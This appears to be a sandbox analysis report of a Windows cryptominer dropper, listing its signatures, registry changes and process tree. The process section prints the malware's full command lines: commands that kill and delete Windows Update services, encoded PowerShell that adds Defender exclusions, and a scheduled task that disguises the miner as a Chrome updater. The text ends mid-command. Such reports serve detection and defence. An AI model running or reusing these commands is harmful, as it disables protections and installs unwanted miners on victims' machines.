Analysis Overview
SHA256
6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
Threat Level: Known bad
The file 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28 was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Stops running service(s)
Possible privilege escalation attempt
Modifies file permissions
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Modifies registry key
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-19 18:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-19 18:47
Reported
2024-03-19 18:51
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
157s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\miner2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Temp\miner2.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log | C:\Program Files\Google\Chrome\updater.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Google\Chrome\updater.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Google\Chrome\updater.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\miner2.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe
"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"
C:\Windows\Temp\miner2.exe
"C:\Windows\Temp\miner2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHM